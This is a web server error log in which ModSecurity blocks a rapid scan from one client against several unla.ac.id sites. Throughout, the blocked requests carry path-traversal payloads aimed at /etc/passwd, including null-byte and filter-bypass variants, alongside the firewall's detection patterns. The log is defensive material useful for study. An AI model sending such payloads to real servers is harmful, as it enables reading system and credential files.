[Tue Aug 29 11:45:23.375383 2023] [:error] [pid 2111] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c..\\x5c found within ARGS:dir: http\\x5c..\\x5cadmin\\x5clogin\\x5clogin_check.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO1348Co-f0AAAg-pPAAAAAR"]
[Tue Aug 29 11:45:23.388002 2023] [:error] [pid 2148] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1348Co-f0AAAhkLgEAAAAh"]
[Tue Aug 29 11:45:23.388242 2023] [:error] [pid 2011] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1348Co-f0AAAfbkxIAAAAZ"]
[Tue Aug 29 11:45:23.391482 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1348Co-f0AAAe3@K8AAAAA"]
[Tue Aug 29 11:45:23.394677 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c..\\x5c found within ARGS:dir: http\\x5c..\\x5cadmin\\x5clogin\\x5clogin_check.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO1348Co-f0AAAhtjdAAAAAq"]
[Tue Aug 29 11:45:24.367494 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..././..././..././..././..././..././..././..././..././..././ found within ARGS:script: ..././..././..././..././..././..././..././..././..././..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webmail/old/calendar/minimizer/index.php"] [unique_id "ZO135MCo-f0AAAhtjdEAAAAq"]
[Tue Aug 29 11:45:24.370608 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..././..././..././..././..././..././..././..././..././..././ found within ARGS:script: ..././..././..././..././..././..././..././..././..././..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/webmail/old/calendar/minimizer/index.php"] [unique_id "ZO135MCo-f0AAAhzvbAAAAAx"]
[Tue Aug 29 11:45:24.371585 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO135MCo-f0AAAh13wMAAAAz"]
[Tue Aug 29 11:45:24.372809 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..././..././..././..././..././..././..././..././..././..././ found within ARGS:script: ..././..././..././..././..././..././..././..././..././..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/webmail/old/calendar/minimizer/index.php"] [unique_id "ZO135MCo-f0AAAfSWjoAAAAB"]
[Tue Aug 29 11:45:24.378371 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..././..././..././..././..././..././..././..././..././..././ found within ARGS:script: ..././..././..././..././..././..././..././..././..././..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/webmail/old/calendar/minimizer/index.php"] [unique_id "ZO135MCo-f0AAAfEB1wAAAAO"]
[Tue Aug 29 11:45:24.389508 2023] [:error] [pid 2159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..././..././..././..././..././..././..././..././..././..././ found within ARGS:script: ..././..././..././..././..././..././..././..././..././..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/webmail/old/calendar/minimizer/index.php"] [unique_id "ZO135MCo-f0AAAhvjWwAAAAs"]
[Tue Aug 29 11:45:24.392298 2023] [:error] [pid 2111] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO135MCo-f0AAAg-pPMAAAAR"]
[Tue Aug 29 11:45:24.392410 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c..\\x5c found within ARGS:dir: http\\x5c..\\x5cadmin\\x5clogin\\x5clogin_check.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO135MCo-f0AAAhtjdIAAAAq"]
[Tue Aug 29 11:45:24.411615 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/manage/log/view"] [unique_id "ZO135MCo-f0AAAfSWjsAAAAB"]
[Tue Aug 29 11:45:25.357714 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:layout: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO135cCo-f0AAAhzvbIAAAAx"]
[Tue Aug 29 11:45:25.358126 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..././..././..././..././..././..././..././..././..././..././ found within ARGS:style: ..././..././..././..././..././..././..././..././..././..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webmail/old/calendar/minimizer/index.php"] [unique_id "ZO135cCo-f0AAAhT3xkAAAAD"]
[Tue Aug 29 11:45:25.360709 2023] [:error] [pid 2168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/manage/log/view"] [unique_id "ZO135cCo-f0AAAh4DZAAAAA2"]
[Tue Aug 29 11:45:25.373512 2023] [:error] [pid 2148] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/manage/log/view"] [unique_id "ZO135cCo-f0AAAhkLgMAAAAh"]
[Tue Aug 29 11:45:25.383689 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:layout: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO135cCo-f0AAAhoHMsAAAAl"]
[Tue Aug 29 11:45:25.385022 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:layout: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO135cCo-f0AAAhhcxcAAAAd"]
[Tue Aug 29 11:45:25.392901 2023] [:error] [pid 2099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:layout: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO135cCo-f0AAAgzyUQAAAAF"]
[Tue Aug 29 11:45:25.394574 2023] [:error] [pid 2111] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/manage/log/view"] [unique_id "ZO135cCo-f0AAAg-pPQAAAAR"]
[Tue Aug 29 11:45:25.397319 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:layout: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO135cCo-f0AAAdQ3z0AAAAV"]
[Tue Aug 29 11:45:25.401033 2023] [:error] [pid 2153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..././..././..././..././..././..././..././..././..././..././ found within ARGS:style: ..././..././..././..././..././..././..././..././..././..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/webmail/old/calendar/minimizer/index.php"] [unique_id "ZO135cCo-f0AAAhpwQsAAAAm"]
[Tue Aug 29 11:45:25.401036 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..././..././..././..././..././..././..././..././..././..././ found within ARGS:style: ..././..././..././..././..././..././..././..././..././..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/webmail/old/calendar/minimizer/index.php"] [unique_id "ZO135cCo-f0AAAe3@LMAAAAA"]
[Tue Aug 29 11:45:25.410684 2023] [:error] [pid 2144] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/manage/log/view"] [unique_id "ZO135cCo-f0AAAhgoHwAAAAb"]
[Tue Aug 29 11:45:25.411251 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..././..././..././..././..././..././..././..././..././..././ found within ARGS:style: ..././..././..././..././..././..././..././..././..././..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/webmail/old/calendar/minimizer/index.php"] [unique_id "ZO135cCo-f0AAARphLkAAAAU"]
[Tue Aug 29 11:45:25.422880 2023] [:error] [pid 2168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/log/view"] [unique_id "ZO135cCo-f0AAAh4DZIAAAA2"]
[Tue Aug 29 11:45:25.427057 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..././..././..././..././..././..././..././..././..././..././ found within ARGS:style: ..././..././..././..././..././..././..././..././..././..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/webmail/old/calendar/minimizer/index.php"] [unique_id "ZO135cCo-f0AAAhhcxgAAAAd"]
[Tue Aug 29 11:45:26.379326 2023] [:error] [pid 2108] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/log/view"] [unique_id "ZO135sCo-f0AAAg8a9UAAAAK"]
[Tue Aug 29 11:45:26.455243 2023] [:error] [pid 2153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/log/view"] [unique_id "ZO135sCo-f0AAAhpwRAAAAAm"]
[Tue Aug 29 11:45:26.462908 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..././..././..././..././..././..././..././..././..././..././ found within ARGS:script: ..././..././..././..././..././..././..././..././..././..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/webmail/old/calendar/minimizer/index.php"] [unique_id "ZO135sCo-f0AAAhrqIQAAAAo"]
[Tue Aug 29 11:45:26.464609 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/log/view"] [unique_id "ZO135sCo-f0AAAfSWkEAAAAB"]
[Tue Aug 29 11:45:26.476930 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:layout: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO135sCo-f0AAARphLsAAAAU"]
[Tue Aug 29 11:45:27.360013 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/manage/log/view"] [unique_id "ZO1358Co-f0AAAdQ30MAAAAV"]
[Tue Aug 29 11:45:27.378119 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/log/view"] [unique_id "ZO1358Co-f0AAARphL0AAAAU"]
[Tue Aug 29 11:45:27.383992 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/manage/log/view"] [unique_id "ZO1358Co-f0AAAhlz5IAAAAi"]
[Tue Aug 29 11:45:27.389415 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..././..././..././..././..././..././..././..././..././..././ found within ARGS:style: ..././..././..././..././..././..././..././..././..././..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/webmail/old/calendar/minimizer/index.php"] [unique_id "ZO1358Co-f0AAAe3@LgAAAAA"]
[Tue Aug 29 11:45:27.394991 2023] [:error] [pid 2161] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/manage/log/view"] [unique_id "ZO1358Co-f0AAAhxwn0AAAAv"]
[Tue Aug 29 11:45:27.401661 2023] [:error] [pid 2153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/manage/log/view"] [unique_id "ZO1358Co-f0AAAhpwRUAAAAm"]
